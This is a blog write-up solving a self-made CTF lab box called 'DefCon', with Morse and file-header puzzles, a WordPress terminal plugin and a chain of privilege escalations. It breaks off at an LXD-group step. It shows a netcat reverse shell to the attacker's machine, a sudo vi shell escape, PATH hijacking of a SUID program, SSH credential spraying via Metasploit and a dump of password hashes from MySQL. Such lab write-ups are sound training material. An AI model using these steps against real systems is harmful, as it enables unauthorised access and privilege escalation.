6 July 2022

Pentesting Fun Stuff

following the cyber security path…

DefCon

Introduction

After a first challenge, which can be found on tryhackme.com, this is my second challenge, dubbed “DefCon”.
The challenge walks through some basic, typical CTF-like skills.
I will post parts of the solution so people who get stuck can move on after a while, without spoiling everything.

[UPDATE]: Because of the whole Covid-19 thing and the world going into lock-down, I completely forgot that I hadn’t finished this write-up and had got stuck at user Smith. This update is the last one, as it covers the last piece: escalating to root.

Recon

First finding open ports and running services:

PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh?
80/tcp  open   http     Apache httpd 2.4.25
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=6/10%Time=5CFE6D96%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,8,"8\[Vuu2\r\n");
MAC Address: 00:0C:29:08:EA:C8 (VMware)
Service Info: Host: nsa-server

Web-server

When directing the browser to IP 192.168.2.23 there is an error (Server not found) and the URL has changed.

The browser doesn’t know where to go, because there is no DNS. To solve this add an entry to the /etc/hosts file.

192.168.2.23	nsa-server.net

Now the browser knows where to go.
Because the SSL certificate is self-signed there is a warning.

After accepting the risk, the website is shown.

On this page there are 3 crypto puzzles.

Puzzle 1

dr0 cy berws sthre atapd phi shin g00ghac kergnka liikama lware erfhtim stnegar ans omwarefo drows sapeh tv iruss isiht

Puzzle 2

TTSFM34YHHWGGSRSIEOR0SEMSPRA0YV4IADHDO3RSSOANUR7

Puzzle 3

turret much eagle jazzers slow fish sleep sense red perv ending spider ice atlas flood zebra kilo phone

SSL

When checking the SSL certificate there is some information about an email address that uses another domain name.

This indicates that there are probably several virtual hosts active on the remote web-server.
To browse the other domain name, we adjust the /etc/hosts file again.

By changing the line to: 192.168.2.23 nsa-server.net nsa-secretserver.net, the browser can be directed to the other domain.

There is a terminal on the main page that reports the status of the system.
After waiting long enough it looks like something is wrong with the system, and at the end some code is being exfiltrated.

-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--

The sequence is Morse code. The forward slash functions as the letter delimiter and the backslash as the word delimiter.
The website https://gchq.github.io/CyberChef/ can help with the deciphering.

TE WORDPRE PAWORD OF JON I T1LLAY!!!

There is a problem with the result: it is missing letters.
Taking another look at the source code of the page with the Morse shows why: every run of three dots is stored as the HTML entity &#8230; (an ellipsis character), which is not valid Morse.
To solve this problem a small side step is needed.

root@redteam:~/DefCon/morse# echo "-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--" > string.txt
root@redteam:~/DefCon/morse# sed -i 's/\&\#8230\;/.../g' string.txt 
root@redteam:~/DefCon/morse# cat string.txt 
-/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.--

After another try with the corrected string, the result in CyberChef is better.

THE WORDPRESS PASSWORD OF JOHN IS [SPOILER]
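
The decoding step above, as an added Python example rather than the CyberChef run from the write-up: it undoes the &#8230; entity damage before decoding and, unlike the first attempt, marks unknown symbols with '?' instead of dropping them. The Morse string is the one from the page; the entity-encoded variant is constructed here to mimic the page source.

```python
import html

# International Morse: letters, digits and the punctuation that occurs on the page.
MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "-.-.--": "!", "..--..": "?", ".-.-.-": ".", "--..--": ",", "-....-": "-",
}

# The sequence as it appears in the write-up (copied from the page, including the
# ellipsis characters that broke the first decoding attempt).
RAW_FROM_PAGE = r"-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--"

# Constructed stand-in for the page source: there each ellipsis was the HTML
# entity &#8230;, which is what the write-up's sed command replaced.
RAW_FROM_SOURCE = RAW_FROM_PAGE.replace("\u2026", "&#8230;")


def repair_ellipsis(morse: str) -> str:
    """Undo the damage the web page did: decode HTML entities, then turn every
    HORIZONTAL ELLIPSIS (U+2026, a single character) back into three Morse dots."""
    return html.unescape(morse).replace("\u2026", "...")


def decode_morse(morse: str, letter_sep: str = "/", word_sep: str = "\\",
                 repair: bool = True) -> str:
    """Decode Morse with the page's delimiters: '/' between letters and '\\'
    between words. Unknown symbols become '?' instead of being dropped
    silently, so corrupted input shows exactly where it is corrupted."""
    if repair:
        morse = repair_ellipsis(morse)
    words = []
    for word in morse.split(word_sep):
        symbols = [sym for sym in word.split(letter_sep) if sym]
        words.append("".join(MORSE_TABLE.get(sym, "?") for sym in symbols))
    return " ".join(words)


if __name__ == "__main__":
    print("without repair:", decode_morse(RAW_FROM_PAGE, repair=False))
    print("with repair:   ", decode_morse(RAW_FROM_PAGE))
```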

WordPress – Graham

The WordPress dashboard holds a menu called plugins. Here there is a plugin called WPTerm, which offers a terminal for the system.

EoP 1 – Graham > John

In the /home/graham folder there is some mail.

graham:/home/graham $ cat mbox
From john@nsa-server Mon Jun 10 11:35:48 2019
Return-path: <john@nsa-server>
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
	(envelope-from <john@nsa-server>)
	id 1haGiS-0004Sh-6R
	for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
To: <graham@nsa-server>
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: <E1haGiS-0004Sh-6R@nsa-server>
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

John

In the Trash folder there is a deleted note.

graham:/home/graham/.local/share/Trash/files $ cat note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? Wink Wink!
Pretty easy right? Try not to forget this one also.
You know how the boss is like! You wanna get fired or something?

Also smart idea to send this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll throw it away....no one will know.

hahahaha......now who is a cybernoob!!!!

Best,

Graham


P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?

The new password of John is hidden inside this message in plain sight.
The last line contains some uppercase letters; extracting them from the string gives the password.

root@redteam:~/DefCon/john# echo "You Do kNow whEre The paSswoRd Is hiDden rigHt?" > pass.enc
root@redteam:~/DefCon/john# cat pass.enc | sed 's/[a-z]//g' | sed 's/ //g' | sed 's/\?//g' > pass.dec
root@redteam:~/DefCon/john# cat pass.dec 
[SPOILER]

With the username and password, switching to john with su would be the next step.

graham:/home/graham/.local/share/Trash/files $ su john
su: must be run from a terminal

That is not going to work. Normally this would be a good time to SSH into the system as john.
But the SSH service on port 22 is a honeypot, so that would be a waste of time.
Instead, a reverse shell is the better way to get a proper TTY.

First start a listener on your machine with netcat.

root@kali:~# nc -lvnp 1337
listening on [any] 1337 ...

Then connect from the remote machine to your machine with netcat.

graham:/home/graham/.local/share/Trash/files $ nc 10.10.10.128 1337 -e /bin/sh

Now the connection is established and there is a reverse shell running.

connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 43696
id
uid=1002(graham) gid=1002(graham) groups=1002(graham),8(mail)

Now to get a proper TTY.

python -c 'import pty;pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham/.local/share/Trash/files$

After this switch to user John.

graham@nsa-server:/home/graham/.local/share/Trash/files$ su john
Password: 
john@nsa-server:/home/graham/.local/share/Trash/files$ id
uid=1003(john) gid=1003(john) groups=1003(john),8(mail)

EoP 2 – John > George

First see what this user can do.

john@nsa-server:~$ sudo -l
sudo -l
[sudo] password for john: YDNETSRIDH

Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh

It looks like user john can start a proper ssh server.

john@nsa-server:~$ sudo /bin/systemctl start ssh

But port 22 was already used for the honeypot, so let's check which port the real SSH server uses.

john@nsa-server:~$ ss -tan         
ss -tan
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
LISTEN     0      80     127.0.0.1:3306                     *:*                  
LISTEN     0      128          *:80                       *:*                  
LISTEN     0      5      10.14.185.1:53                       *:*                  
LISTEN     0      128          *:22                       *:*                  
LISTEN     0      20     127.0.0.1:25                       *:*                  
LISTEN     0      128          *:443                      *:*                  
LISTEN     0      128          *:222                      *:*                  
ESTAB      0      0      192.168.20.130:443                192.168.20.131:44098              
ESTAB      0      91     192.168.20.130:50678              192.168.20.131:9999               
LISTEN     0      5      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53                      :::*                  
LISTEN     0      2          ::1:3350                    :::*                  
LISTEN     0      20         ::1:25                      :::*                  
LISTEN     0      2           :::3389                    :::*                  
LISTEN     0      128         :::222                     :::*

Looks like port 222 is listening for a connection.

n0w4n@lab:~/DefCon$ ssh john@nsa-server.net -p 222
The authenticity of host '[nsa-server.net]:222 ([192.168.20.130]:222)' can't be established.
ECDSA key fingerprint is SHA256:sRxKXwYbv1ua3s7dbnPyX0hmggOGZ6IX3eDflEQ66Bo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nsa-server.net]:222,[192.168.20.130]:222' (ECDSA) to the list of known hosts.
john@nsa-server.net's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Fri Apr 10 14:03:51 2020 from 10.10.10.130
john@nsa-server:~$

There is a file in the Documents folder.

john@nsa-server:~/Documents$ ls -lah
ls -lah
total 20K
drwxr-x---  2 john john 4.0K Apr 10 14:42 .
drwxr-x--- 16 john john 4.0K Apr 22 10:23 ..
-rw-r--r--  1 john john  11K Apr 10 14:42 secret.png
john@nsa-server:~/Documents$ file secret.png
file secret.png
secret.png: PDF document, version \012.\012

Going by the extension, it looks like a picture.
But when checking the file type, Linux says it's a PDF.
To get a better look at the file, we transfer it to the local machine.

n0w4n@lab:~/DefCon$ scp -P 222 john@nsa-server.net:/home/john/Documents/secret.png .
john@nsa-server.net's password: 
secret.png

When we try to open the file as a picture, there is nothing to show.
Let's copy the file and rename it to a .pdf file.

Also nothing.
When looking at the file in hexeditor, the important part to check is the header.

There are several lists of file signatures (magic bytes) available online.
Comparing the PDF signature with our file shows that the first 5 bytes match the PDF header.

But the file wasn't named .pdf; it was .png.

Looking a bit further, the 6th, 7th and 8th bytes look like part of the PNG header.
So the start of a PNG was overwritten with a PDF header. Let's overwrite the header again to match the PNG file signature.

Looking at the ASCII section of hexeditor afterwards, the header is now the one of a PNG.

n0w4n@lab:~/DefCon$ file secret.png
secret.png: PNG image data, 886 x 669, 8-bit/color RGB, non-interlaced
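
The header check and repair above, as an added Python example that is not part of the write-up: it classifies a file by its magic bytes, recognises a PNG whose first five bytes were overwritten with %PDF-, restores the signature and parses the IHDR chunk (dimensions, bit depth, colour type) with a CRC check. secret.png itself is not on the page, so a stand-in with the same 886 x 669 8-bit RGB header is constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"   # 89 50 4E 47 0D 0A 1A 0A
PDF_SIG = b"%PDF-"               # 25 50 44 46 2D
COLOUR_TYPES = {0: "greyscale", 2: "RGB", 3: "palette", 4: "greyscale+alpha", 6: "RGBA"}


def identify(data: bytes) -> str:
    """Classify a file by its leading magic bytes, the way `file` does."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(PDF_SIG):
        return "pdf"
    return "unknown"


def looks_like_clobbered_png(data: bytes) -> bool:
    """True when the first 5 bytes say PDF but bytes 6-8 (0D 0A 1A, the tail of
    the PNG signature) and an IHDR chunk at offset 12 say the rest is a PNG."""
    return (data[:5] == PDF_SIG
            and data[5:8] == PNG_SIG[5:8]
            and data[12:16] == b"IHDR")


def repair_png_signature(data: bytes) -> bytes:
    """Put the full 8-byte PNG signature back; everything after it is untouched."""
    if not looks_like_clobbered_png(data):
        raise ValueError("not a PNG with an overwritten signature")
    return PNG_SIG + data[8:]


def parse_ihdr(data: bytes) -> dict:
    """Read the IHDR chunk (always the first chunk of a PNG) and check its CRC,
    which covers the chunk type and chunk data but not the length field."""
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("missing or malformed IHDR chunk")
    body = data[16:29]
    (crc,) = struct.unpack(">I", data[29:33])
    width, height, depth, colour, _comp, _filt, interlace = struct.unpack(">IIBBBBB", body)
    return {
        "width": width, "height": height, "bit_depth": depth,
        "colour": COLOUR_TYPES.get(colour, f"type {colour}"),
        "interlaced": interlace == 1,
        "crc_ok": zlib.crc32(ctype + body) == crc,
    }


def build_sample(width: int = 886, height: int = 669) -> bytes:
    """Constructed stand-in for secret.png: a valid PNG signature and IHDR
    (8-bit RGB, non-interlaced, the dimensions `file` reported) whose first
    5 bytes have been overwritten with the PDF magic."""
    body = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    ihdr = struct.pack(">I", 13) + b"IHDR" + body + struct.pack(">I", zlib.crc32(b"IHDR" + body))
    return PDF_SIG + (PNG_SIG + ihdr)[5:]


if __name__ == "__main__":
    broken = build_sample()
    print("before:", identify(broken))
    fixed = repair_png_signature(broken)
    print("after: ", identify(fixed), parse_ihdr(fixed))
```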

The file is now readable as a picture and when opening it, there is a string.
A password maybe? But for who?

n0w4n@lab:~/DefCon$ cat names.list 
george
graham
nicky
samantha
smith

To match the found password to the correct name, there are several ways to go about it.
In this write-up, we'll look at the following three:

First one – because it's a small list of names, we can do it by hand or try a small bash one-liner.

n0w4n@lab:~/DefCon$ for i in $(cat names.list); do ssh -l "${i}" nsa-server.net -p 222; done
george@nsa-server.net's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 14:45:30 2020 from 10.10.10.130
george@nsa-server:~$

Pretty simple, but with a very long list of names it becomes an annoying task to perform.
The second option is to use a tool called sshpass.

n0w4n@lab:~/DefCon$ for i in $(cat names.list); do sshpass -p "2W3dsF5tGh-Kl#1" ssh -o StrictHostKeyChecking=no "${i}"@nsa-server.net -p 222; done
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:40:32 2020 from 192.168.20.131
george@nsa-server:~$

This option is quite a bit faster and didn’t need any manual input for the password.
The final option is to use Metasploit:

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 2W3dsF5tGh-Kl#1
PASSWORD => 2W3dsF5tGh-Kl#1
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE names.list
USER_FILE => names.list
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS nsa-server.net
RHOSTS => nsa-server.net
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > set RPORT 222
RPORT => 222
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.20.130:222 - Success: 'george:2W3dsF5tGh-Kl#1' ''
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.20.131:38663 -> 192.168.20.130:222) at 2020-04-22 13:53:41 +0200
[-] 192.168.20.130:222 - Failed: 'graham:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'nicky:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'samantha:2W3dsF5tGh-Kl#1'
[-] 192.168.20.130:222 - Failed: 'smith:2W3dsF5tGh-Kl#1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This option also works fast when you have a very long list of usernames.
It is just as fast when you also have a list of passwords to try against them.

EoP 3 – George > Samantha

The recon starts over after logging in as a different user.
In this case, user george also has some sudo rights on this system.

george@nsa-server:~$ sudo -l
[sudo] password for george: 
Matching Defaults entries for george on nsa-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User george may run the following commands on nsa-server:
    (samantha) /usr/bin/vi

This user can run the Vi editor with the rights of user samantha.
We can abuse this, as long as Vi is started as user samantha.

george@nsa-server:~$ sudo -u samantha vi test

Inside the Vi editor there is an option to run a command:

$ id
uid=1006(samantha) gid=1006(samantha) groups=1006(samantha)

Use Python again to get a proper TTY.

$ python -c 'import pty;pty.spawn("/bin/bash");'
samantha@nsa-server:/home/george$

EoP 4 – Samantha > Nicky

Back in the home folder of this user, there is something of interest.

samantha@nsa-server:~$ ls -lah
total 72K
drwxr-x--- 10 samantha samantha 4.0K Apr 10 19:49 .
drwxr-xr-x  8 root     root     4.0K Apr 10 14:40 ..
-rw-------  1 samantha samantha    1 Apr 11 17:55 .bash_history
-rw-r--r--  1 samantha samantha  220 May 15  2017 .bash_logout
-rw-r--r--  1 samantha samantha 3.5K May 15  2017 .bashrc
-rwsr-xr-x  1 root     root     8.6K Apr 10 16:17 check
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Desktop
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Documents
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Downloads
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Music
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Pictures
-rw-r--r--  1 samantha samantha  675 May 15  2017 .profile
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Public
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Templates
drwxr-xr-x  2 samantha samantha 4.0K May 10  2019 Videos
-rw-------  1 samantha samantha 2.1K Apr 10 19:49 .viminfo

There is an executable with the SUID flag enabled.
Let’s see what the program does.

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

Netid  State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
udp    UNCONN     0      0         *:1900                  *:*                  
udp    UNCONN     0      0      10.14.185.1:53                    *:*                  
udp    UNCONN     0      0         *:58430                 *:*                  
udp    UNCONN     0      0      *%lxdbr0:67                    *:*                  
udp    UNCONN     0      0         *:5353                  *:*                  
udp    UNCONN     0      0      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53                   :::*                  
udp    UNCONN     0      0        :::58540                :::*                  
udp    UNCONN     0      0        :::5353                 :::*                  
tcp    LISTEN     0      80     127.0.0.1:3306                  *:*                  
tcp    LISTEN     0      128       *:80                    *:*                  
tcp    LISTEN     0      5      10.14.185.1:53                    *:*                  
tcp    LISTEN     0      128       *:22                    *:*                  
tcp    LISTEN     0      20     127.0.0.1:25                    *:*                  
tcp    LISTEN     0      128       *:443                   *:*                  
tcp    LISTEN     0      128       *:222                   *:*                  
tcp    ESTAB      0      0      192.168.20.130:222                192.168.20.131:48834              
tcp    LISTEN     0      5      fe80::cc1a:73ff:fe37:ea85%lxdbr0:53                   :::*                  
tcp    LISTEN     0      2       ::1:3350                 :::*                  
tcp    LISTEN     0      20      ::1:25                   :::*                  
tcp    LISTEN     0      2        :::3389                 :::*                  
tcp    LISTEN     0      128      :::222                  :::*

It runs the ss command and shows a list of the current connections.
If the program calls ss by name instead of by its absolute path, we can manipulate PATH and fool the program into running something of our choosing.

To do this, we first create our own version of ss.

samantha@nsa-server:~$ echo "/bin/bash" > /tmp/ss

Then we make the file executable.

samantha@nsa-server:~$ chmod +x /tmp/ss

Because we want the program to execute our ss file instead of the correct one, we alter the PATH variable.

samantha@nsa-server:~$ export PATH=/tmp:$PATH

This way, whenever the system looks for a program, it walks through the directories in the PATH variable in order.
Normally it starts in /usr/local/bin, then goes to /usr/bin, and keeps going until it finds the program, or it doesn't and you get an error that the program can't be found.
When the check program is executed, the lookup for ss walks through PATH the same way, but now it starts in /tmp.
It finds our ss executable there, takes it for the real one and runs it.

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

nicky@nsa-server:~$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)

Running the program resulted in executing our ss version and elevated our rights to... nicky (not root – bummer).
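
To show the lookup order described above, together with the check a defender would run on the PATH a privileged program inherits, here is an added Python example (not code from the write-up). It builds two scratch directories with placeholder ss files as assumed stand-ins for /usr/bin and /tmp; nothing in them is executed.

```python
import os
import stat
import tempfile
from typing import List, Optional

# secure_path as shown in the sudo -l output on this box.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve(command: str, path: str) -> Optional[str]:
    """Return the first executable called `command` found walking PATH left
    to right. This is exactly how a bare `ss` inside a program is looked up,
    which is why a SUID binary must call /bin/ss (absolute path) or reset
    PATH to a trusted value such as SECURE_PATH before running anything."""
    for entry in path.split(os.pathsep):
        candidate = os.path.join(entry or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit_path(path: str) -> List[str]:
    """Findings a defender wants when reviewing the PATH a privileged program
    inherits: entries in which an unprivileged user can plant a binary."""
    findings = []
    for entry in path.split(os.pathsep):
        if entry in ("", "."):
            findings.append(f"{entry!r}: resolves to the current directory")
            continue
        if not os.path.isabs(entry):
            findings.append(f"{entry}: relative entry")
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            continue
        # The sticky bit (as on /tmp) only stops users deleting each other's
        # files; anyone can still create their own `ss` there, so flag it.
        if mode & stat.S_IWOTH:
            findings.append(f"{entry}: world-writable")
    return findings


def demo() -> dict:
    """Reproduce the write-up's situation in two scratch directories: a
    'system' directory holding the legitimate ss and a world-writable
    directory (like /tmp) where a planted ss sits. Both files are
    constructed placeholders; nothing is executed."""
    base = tempfile.mkdtemp(prefix="pathdemo-")
    system_dir = os.path.join(base, "usr-bin")
    scratch_dir = os.path.join(base, "tmp")
    os.mkdir(system_dir)
    os.mkdir(scratch_dir)
    os.chmod(scratch_dir, 0o1777)        # sticky and world-writable, like /tmp
    for directory in (system_dir, scratch_dir):
        target = os.path.join(directory, "ss")
        with open(target, "w") as fh:
            fh.write("#!/bin/sh\n")        # placeholder body, never run
        os.chmod(target, 0o755)
    hijacked_path = scratch_dir + os.pathsep + system_dir
    return {
        "system_dir": system_dir,
        "scratch_dir": scratch_dir,
        "clean": resolve("ss", system_dir),          # PATH without /tmp
        "hijacked": resolve("ss", hijacked_path),    # export PATH=/tmp:$PATH
        "findings": audit_path(hijacked_path),
    }


if __name__ == "__main__":
    result = demo()
    print("PATH trusted  ->", result["clean"])
    print("PATH hijacked ->", result["hijacked"])
    for finding in result["findings"]:
        print("finding:", finding)
```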

EoP 5 – Nicky > Smith

When looking at the connections earlier, there was another listener of interest:
a MariaDB instance running locally.
As it turns out, user nicky has access to it.
To log in to MariaDB you need a password.
Lucky for you, user nicky stores hers in a hidden file.

nicky@nsa-server:~/Documents$ ls -lah
total 12K
drwxr-xr-x  2 nicky nicky 4.0K Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4.0K Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
nicky@nsa-server:~/Documents$ cat .passwd 
We_iuh#-qaSW1

As the list of network connections showed, the MySQL server listens on 127.0.0.1:3306 only, so it can only be reached from the machine itself.

nicky@nsa-server:/home/nicky/Documents$ mysql -u nicky -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 22
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

List all databases.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.02 sec)

Select the database to use.

MariaDB [wordpress]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

Show all tables.

MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
30 rows in set (0.00 sec)

Select the desired columns to show.

MariaDB [mysql]> select user,password from user;
+---------+-------------------------------------------+
| user    | password                                  |
+---------+-------------------------------------------+
| root    |                                           |
| admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| wpadmin | *5EF818CD1907F11532AD4EB544573261C73F7F2E |
| smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 |
+---------+-------------------------------------------+
5 rows in set (0.00 sec)

MariaDB [mysql]>

Crack it with hashcat, or just do a Google search for a site with lists of known hashes.
One of the hashes is a known one: the password hash of user smith.

Now exit mysql and switch to user smith.

MariaDB [mysql]> exit;
Bye
nicky@nsa-server:/home/nicky/Documents$ su smith
Password: 
smith@nsa-server:/home/nicky/Documents$ id
uid=1001(smith) gid=1001(smith) groups=1001(smith),8(mail),999(lxd)

EoP 6 – Smith > Root

This user is a member of the lxd group.
Lucky for us, on a Linux system running LXD, members of the lxd group can escalate their privileges to root.

smith@nsa-server:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:01:e2:4b brd ff:ff:ff:ff:ff:ff
    inet 192.168.20.130/24 brd 192.168.20.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe01:e24b/64 scope link 
       valid_lft forever preferred_lft forever
3: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
    link/ether ce:1a:73:37:ea:85 brd ff:ff:ff:ff:ff:ff
    inet 10.14.185.1/24 scope global lxdbr0
       valid_lft forever preferred_lft forever
    inet6 fe80::cc1a:73ff:fe37:ea85/64 scope link 
       valid_lft forever preferred_lft forever

As we can see, there is an interface with the name lxdbr0.
This is the LXD network bridge, which connects the containers to the host.

Let’s see if there is a container loaded already.

smith@nsa-server:~$ lxc ls
bash: lxc: command not found

